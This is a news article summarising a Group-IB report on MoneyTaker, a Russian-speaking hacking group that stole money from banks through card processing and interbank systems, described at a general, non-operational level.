Security experts have identified a covert group of Russian-speaking hackers known as MoneyTaker, which has been actively targeting banks, financial institutions, and legal firms predominantly in the United States, the United Kingdom, and Russia. The Moscow-based cybersecurity firm Group-IB released a detailed report on Monday, unveiling the group’s operations that date back to at least May 2016.
Over the last 18 months, MoneyTaker is believed to have executed more than 20 successful attacks against various financial organizations, resulting in the theft of over $11 million alongside sensitive documents that could facilitate future intrusions. The primary focus of these attacks appears to be on card processing systems, particularly the AWS CBR, an important Russian interbank system, as well as the SWIFT international bank messaging service in the United States.
Group-IB’s report indicates that criminals associated with MoneyTaker have acquired documentation for OceanSystems’ FedLink card processing system, utilized by around 200 banks across Latin America and the U.S. The firm has raised alarms that the hacking group’s operations are ongoing, with potential future targets including banks in Latin America.
Since their first reported attack in May 2016, MoneyTaker has systematically focused on smaller community banks in states such as California, Illinois, and Florida—often those with insufficient cybersecurity measures. Despite the high volume of attacks, MoneyTaker has successfully concealed its activities by employing a range of publicly available penetration testing and hacking tools, such as Metasploit and Mimikatz, which have been featured in presentations at Russian hacking conventions.
The group has demonstrated a reliance on fileless malware tactics, which operate exclusively in the RAM of compromised systems, making detection by traditional antivirus solutions challenging. To maintain persistence within targeted networks, they utilize PowerShell and VBS scripts, which are both adaptable and stealthy. For privilege escalation, attackers leverage exploit modules from the Metasploit framework, enabling them to extract unencrypted Windows credentials from compromised systems.
Furthermore, MoneyTaker uses advanced techniques such as generating SSL certificates under the names of reputable organizations—including Bank of America and Microsoft—to obscure malicious traffic. This strategic operational security enables them to direct payloads exclusively to predetermined IP addresses belonging to targeted entities, thereby enhancing their ability to evade detection.
The very first attack attributed to MoneyTaker involved a breach of First Data’s STAR, the largest bank transfer messaging system in the U.S., leading to unauthorized access and financial theft. Subsequent attacks have demonstrated a similar methodology, where attackers exploited vulnerabilities within bank networks to manipulate card processing systems for illicit gains. They executed withdrawal limits for compromised bank cards, allowing money mules to extract cash from ATMs without triggering overdraft protections.
The average financial loss incurred by U.S. banks from MoneyTaker’s operations stands at approximately $500,000 per incident, while estimates indicate over $3 million was siphoned from multiple Russian banks. A notable attack aimed at a Russian bank employed modular malware designed to interface with the AWS CBR, effectively allowing attackers to modify payment orders discreetly before erasing traces of their intrusion.
While the specific entry points of compromise remain largely speculative, one case suggested infiltration through the home computer of a bank administrator. Group-IB surmises that MoneyTaker is now aiming to extend its reach into the SWIFT interbank communication system, although current evidence does not link them to recent attacks targeting SWIFT.
This ongoing threat underscores the critical need for robust cybersecurity measures within financial institutions. As the techniques employed by hacking groups like MoneyTaker continue to evolve, a comprehensive defense strategy must be prioritized to safeguard sensitive financial data and secure network infrastructures against sophisticated cyber threats.